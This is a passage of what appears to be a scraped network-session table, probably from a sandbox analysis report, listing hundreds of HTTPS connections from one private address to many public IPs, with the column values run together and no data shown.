                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9840192.168.2.1450216203.246.200.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9841192.168.2.144826664.107.197.207443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9842192.168.2.145902214.128.216.139443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9843192.168.2.1441210133.250.40.243443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9844192.168.2.144990650.246.176.208443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9845192.168.2.143540461.155.50.38443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9846192.168.2.1453178200.179.153.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9847192.168.2.144893468.72.75.233443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9848192.168.2.1433054212.160.71.13443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9849192.168.2.1460026171.138.249.115443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9850192.168.2.1443720172.75.131.162443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9851192.168.2.145405649.122.144.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9852192.168.2.1442982213.140.126.29443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9853192.168.2.144369874.76.223.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9854192.168.2.1442184165.124.10.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9855192.168.2.144439424.167.236.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9856192.168.2.145147488.227.167.237443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9857192.168.2.144436882.255.47.253443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9858192.168.2.1442136190.136.117.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9859192.168.2.144961299.143.85.197443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9860192.168.2.146079236.201.206.144443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9861192.168.2.1436712179.78.251.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9862192.168.2.1451630148.190.131.90443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9863192.168.2.14359222.70.31.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9864192.168.2.1446576191.200.61.186443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9865192.168.2.1446854168.246.224.190443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9866192.168.2.1450836139.249.136.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9867192.168.2.14587589.0.31.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9868192.168.2.1444528161.77.187.7443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9869192.168.2.1451956126.18.203.172443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9870192.168.2.1453700120.231.28.118443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9871192.168.2.144962679.153.117.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9872192.168.2.143943079.141.4.157443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9873192.168.2.1438742165.190.45.188443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9874192.168.2.143853874.209.33.143443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9875192.168.2.1448516111.24.153.218443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9876192.168.2.145253840.165.246.28443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9877192.168.2.145594017.27.169.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9878192.168.2.144551050.237.94.185443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9879192.168.2.145394683.24.38.161443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9880192.168.2.1437950218.111.70.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9881192.168.2.145659638.63.36.84443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9882192.168.2.144801878.189.55.208443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9883192.168.2.143984299.150.155.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9884192.168.2.145117887.44.69.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9885192.168.2.1434346144.51.208.212443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9886192.168.2.1441640211.96.131.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9887192.168.2.1438002191.163.139.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9888192.168.2.1451370120.234.136.121443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9889192.168.2.1445284194.215.81.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9890192.168.2.1438842119.192.93.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9891192.168.2.1458020170.68.98.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9892192.168.2.1448376126.99.186.248443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9893192.168.2.144162890.169.119.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9894192.168.2.1445678139.142.78.8443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9895192.168.2.144580273.188.178.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9896192.168.2.1435536217.247.223.207443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9897192.168.2.145812694.39.245.165443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9898192.168.2.14574765.251.232.113443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9899192.168.2.1457398159.103.21.78443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9900192.168.2.1450396159.236.85.208443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9901192.168.2.143462237.53.18.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9902192.168.2.1453716150.88.34.1443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9903192.168.2.144755636.17.154.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9904192.168.2.1460858217.123.202.235443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9905192.168.2.143499091.89.80.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9906192.168.2.1439984211.16.190.39443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9907192.168.2.14422628.53.195.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9908192.168.2.1434944137.240.68.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9909192.168.2.145071868.66.192.160443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9910192.168.2.1455006182.120.155.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9911192.168.2.1453222134.117.150.10443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9912192.168.2.144966868.90.228.4443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9913192.168.2.145660245.144.237.122443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9914192.168.2.1445230167.116.37.150443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9915192.168.2.144423431.210.28.79443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9916192.168.2.1445158134.189.31.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9917192.168.2.143723042.76.46.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9918192.168.2.144188675.145.60.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9919192.168.2.1455874124.36.93.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9920192.168.2.143522814.14.10.24443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9921192.168.2.1444844132.216.194.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9922192.168.2.145891291.45.73.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9923192.168.2.1460422119.165.246.131443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9924192.168.2.1434786158.175.50.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9925192.168.2.144056661.73.191.106443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9926192.168.2.144621098.249.247.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9927192.168.2.145952887.241.247.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9928192.168.2.1458120207.17.248.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9929192.168.2.1439814177.51.243.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9930192.168.2.143480674.105.17.112443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9931192.168.2.1449890144.232.189.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9932192.168.2.1444104219.156.42.46443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9933192.168.2.1435936153.53.184.107443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9934192.168.2.1449564163.239.78.169443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9935192.168.2.144479831.153.99.81443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9936192.168.2.1457278221.139.113.150443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9937192.168.2.14527269.66.169.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9938192.168.2.1456750141.194.169.225443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9939192.168.2.14419208.208.13.220443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9940192.168.2.145359614.64.250.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9941192.168.2.1456578194.130.83.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9942192.168.2.143640644.112.24.244443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9943192.168.2.145274462.45.19.247443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9944192.168.2.1443014132.205.22.3443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9945192.168.2.145078453.60.129.14443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9946192.168.2.1447776218.128.55.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9947192.168.2.1457178155.46.113.99443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9948192.168.2.1459278137.55.131.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9949192.168.2.1445252207.227.142.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9950192.168.2.1437152119.157.137.140443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9951192.168.2.145362837.115.53.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9952192.168.2.145278485.170.117.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9953192.168.2.1447632147.168.46.154443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9954192.168.2.1438928114.173.205.13443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9955192.168.2.145562253.5.188.157443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9956192.168.2.1458750155.139.87.91443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9957192.168.2.1451226125.68.142.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9958192.168.2.144441013.17.184.121443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9959192.168.2.1453734211.237.128.206443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9960192.168.2.1458654126.66.221.55443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9961192.168.2.145147858.139.213.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9962192.168.2.1434320129.240.138.117443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9963192.168.2.1439152209.110.37.175443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9964192.168.2.1452926184.227.136.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9965192.168.2.1447022162.107.7.196443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9966192.168.2.144892887.193.235.91443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9967192.168.2.144197873.234.172.140443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9968192.168.2.144916036.129.207.64443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9969192.168.2.1451276208.177.193.150443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9970192.168.2.1451220155.20.172.155443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9971192.168.2.1439614185.51.236.53443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9972192.168.2.145363882.91.98.218443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9973192.168.2.1454082105.177.174.35443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9974192.168.2.1440580165.129.182.13443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9975192.168.2.1435504179.228.126.188443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9976192.168.2.145840057.95.249.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9977192.168.2.145293612.38.251.244443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9978192.168.2.1435688103.229.204.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9979192.168.2.144696214.187.213.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9980192.168.2.145204275.151.79.164443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9981192.168.2.1450690200.109.56.11443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9982192.168.2.1435482148.227.171.226443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9983192.168.2.1440298150.107.50.40443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9984192.168.2.1435738151.184.138.13443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9985192.168.2.145764080.62.132.54443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9986192.168.2.144235046.226.59.126443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9987192.168.2.1451578220.73.175.11443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9988192.168.2.1439298153.17.214.10443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9989192.168.2.144665012.25.218.193443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9990192.168.2.1437806149.91.34.79443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9991192.168.2.145207412.42.183.40443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9992192.168.2.145124047.143.125.165443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9993192.168.2.145419013.85.56.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9994192.168.2.1442366154.128.27.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9995192.168.2.1456070141.97.187.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9996192.168.2.1438376209.148.54.100443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9997192.168.2.1456816150.112.14.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9998192.168.2.1447850136.40.84.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9999192.168.2.143745835.79.104.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10000192.168.2.143875843.182.126.24443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10001192.168.2.1452126138.196.148.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10002192.168.2.1460628171.26.3.47443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10003192.168.2.145875647.176.245.223443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10004192.168.2.1445974119.213.136.82443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10005192.168.2.143610461.72.251.53443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10006192.168.2.1436808151.130.32.160443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10007192.168.2.1441380151.60.26.228443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10008192.168.2.145308490.79.220.18443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10009192.168.2.1444242195.16.84.39443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10010192.168.2.144212686.146.210.116443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10011192.168.2.1440758150.206.14.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10012192.168.2.143516853.169.10.3443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10013192.168.2.1436492160.235.202.134443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10014192.168.2.1438050100.252.95.207443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10015192.168.2.144202854.91.89.166443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10016192.168.2.1453516124.59.253.0443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10017192.168.2.145804842.191.221.133443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10018192.168.2.1454924110.88.65.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10019192.168.2.1448752197.62.111.109443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10020192.168.2.1440144172.62.176.74443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10021192.168.2.1433132195.237.154.233443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10022192.168.2.143894889.254.232.148443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10023192.168.2.1455294180.43.100.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10024192.168.2.1455424135.207.100.240443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10025192.168.2.1453894193.142.42.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10026192.168.2.145004672.14.33.182443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10027192.168.2.1460120139.46.165.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10028192.168.2.1434536196.23.148.7443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10029192.168.2.1447686154.14.234.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10030192.168.2.1440260135.77.156.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10031192.168.2.143911832.85.107.188443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10032192.168.2.1458454120.83.51.103443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10033192.168.2.1439064111.208.12.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10034192.168.2.1438294170.1.181.13443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10035192.168.2.1435002159.144.130.121443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10036192.168.2.145996634.63.98.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10037192.168.2.145828439.212.156.97443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10038192.168.2.145153280.18.171.10443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10039192.168.2.1448498183.129.165.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10040192.168.2.144609689.132.196.62443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10041192.168.2.144705698.241.137.240443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10042192.168.2.1447420106.165.6.46443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10043192.168.2.1435080217.63.237.3443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10044192.168.2.146008825.6.149.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10045192.168.2.1442462194.93.83.60443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10046192.168.2.1435102137.73.129.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10047192.168.2.145181494.88.246.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10048192.168.2.144188683.161.240.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10049192.168.2.145522482.239.38.160443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10050192.168.2.145663478.133.182.97443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10051192.168.2.1435058178.251.201.145443
                                                      TimestampBytes transferredDirectionData


